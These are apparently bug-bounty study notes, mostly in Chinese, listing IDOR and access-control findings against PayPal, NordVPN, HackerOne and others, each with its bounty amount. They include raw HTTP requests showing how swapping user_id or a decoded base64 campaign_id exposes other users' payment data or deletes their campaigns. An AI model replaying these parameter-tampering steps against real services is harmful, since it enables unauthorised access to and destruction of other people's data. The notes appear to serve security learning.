IDOR to add secondary users in /users/api/v1/users
#idor
Step
- PayPal企业帐户允许帐户所有者创建多个二级用户,并为其员工分配特定权限。
- 使企业帐户所有者可以从其他帐户分配次要用户
- 新的次要用户将被授予对登录的访问,从而允许对该单个用户登录的功能的未授权访问.
- 10500$💵
IDOR allow access to payments data of any user
#idor
Step
- 请求包
POST /api/v1/orders HTTP/1.1
Host: join.nordvpn.com
Accept: application/json
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 179
DNT: 1
Connection: close
{
"payment":{
"provider_method_account":"6xdxdd",
"parameters":{
}
},
"action":"order",
"plan_id":653,
"user_id":20027039,
"tax_country_code":"TW",
"payment_retry":0,
"is_installment":false
}
- 响应体
{
"id":42615458,
"user_id":20027039,
"confirmation":{
敏感信息
}
}
- 更改请求包userid ,得到的响应体,泄露铭感数据
{
"id":42616142,
"user_id":89495247,
"confirmation":{
"id":23093800,
别人的铭感信息
}
}
- 1000$💵
Insecure Direct Object Reference (IDOR) - Delete Campaigns
#idor
Step
- 请求包,关注点campaign_id
POST /graphql HTTP/2
Host: hackerone.com
Cookie: yourcookie
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{
"campaign_id":"Z2lkOi8vaGFja2Vyb25lL0NhbXBhaWduLzI0NA==",
},
- base64解码campaign_id ,得到gid://hackerone/Campaign/244
- 更改数字 ,并编码放回包中 ,可更改删除其他公司项目
- 50$💵
IDOR 功能点
#idor
Step
- 更改私人视频的密码1,500$💵
- 编辑其他视频数据,如标题和描述
- 通过成功利用IDOR发布私人视频
- 从图库中删除照片和相册1,500$💵
Access Control Bug
#idor
Step
- 管理员下发会议开通包(一个包理论只有一次会议)给普通用户
- 普通用户使用 包 开通会议时抓包
- 无限重发此包 无限开会议
- 500💵
IDOR
#idor
Step
- A账户(A公司)创建一个消费请求,抓包,观察参数
- B账户(B公司)也创建一个消费请求
- 将A账户的公司id换成B账户的,消费请求随之变换
- 1000💵